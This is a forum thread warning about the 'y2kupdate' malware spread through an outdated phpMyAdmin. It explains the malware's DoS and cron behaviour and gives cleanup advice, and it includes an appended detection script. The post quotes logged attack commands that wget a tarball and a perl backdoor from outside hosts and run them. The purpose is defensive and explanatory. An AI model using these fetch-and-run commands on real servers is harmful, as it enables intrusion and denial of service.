Old 11-15-2009, 02:46 AM   #1
Protector
LQ Newbie
 
Registered: Nov 2009
Posts: 2

Rep: Reputation: 0
y2kupdate denial of service vulnerability


I am posting here to warn others about y2kupdate.

I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.

The entry point to install the software on the Linux servers was a vulnerability in an out of date version of phpMyAdmin.

The apache access_log entry which shows the initial infection taking place is shown below:

GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck

An analysis of the last line of the above log entry reveals:

1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid directory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid

The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends its whole time pushing out DoS packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.

The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.

The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.

It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.

Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.

Additionally there appears to be a second class of application that can exploit the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.

An Apache log entry which shows this type of backdoor exploit is shown below:

GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt

For more information on these vulnerabilities please visit: http://www.securityfocus.com/infocus/1871

Last edited by Protector; 11-17-2009 at 05:43 AM. Reason: Update of posting
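The checks the post walks through (access_log triage for the config.inc.php "c=" injection, hidden drop directories under /tmp, /var/tmp and /dev/shm, the once-a-minute apache cron job, and ports 80/443 held by something other than httpd) collected into one defender-side script. This is an added example, not the poster's own material; the log path /var/log/httpd/access_log, the cron user "apache" and the drop directories are assumptions taken from the post.

```shell
#!/bin/sh
# Added example (not the poster's own scripts): shell checks for the
# indicators described in the post. The log path, the cron user "apache"
# and the drop directories are assumptions taken from the post; adjust
# them for your host. Each check is a function so captured output can be
# reviewed offline by piping it in.

# 1) Access-log triage: find requests that drive the phpMyAdmin
#    config.inc.php "c=" parameter, and undo %20 / + encoding so the
#    injected command line reads as the attacker typed it.
scan_access_log() {
    grep -i 'config\.inc\.php?c=' "$1" |
        sed -e 's/%20/ /g' -e 's/+/ /g' -e 's/%3[Bb]/;/g'
}

# 2) Hidden entries directly under the drop directories the post names
#    (/tmp, /var/tmp, /dev/shm). Well-known X11 sockets are ignored.
find_hidden_drops() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -mindepth 1 -maxdepth 1 -name '.*' \
            ! -name '.X11-unix' ! -name '.ICE-unix' ! -name '.font-unix'
    done
}

# 3) Crontab lines (stdin) that run every minute and reference the
#    y2kupdate binary or a .pid directory, as the post describes.
suspicious_cron_lines() {
    grep -E '^(\*[[:space:]]+){5}.*(y2kupdate|/\.pid/)'
}

# 4) Listener lines (stdin, netstat -lnpt / ss -lntp format) where port
#    80 or 443 is held by a process other than httpd/apache2.
listeners_not_httpd() {
    grep -E ':(80|443)[[:space:]]' | grep -vE 'httpd|apache2'
}

# Live run on the local host when invoked as: sh check_y2k.sh --live
# (crontab -u needs root; the other checks work as any user).
if [ "${1:-}" = "--live" ]; then
    scan_access_log /var/log/httpd/access_log
    find_hidden_drops /tmp /var/tmp /dev/shm
    crontab -u apache -l 2>/dev/null | suspicious_cron_lines
    netstat -lnpt 2>/dev/null | listeners_not_httpd
fi
```

Saved output of netstat or crontab -l from a suspect host can be piped into the matching function for offline review.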
 
Old 11-15-2009, 03:44 AM   #2
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371
I've moved your post from where you originally posted to its own thread (please don't resurrect dead threads).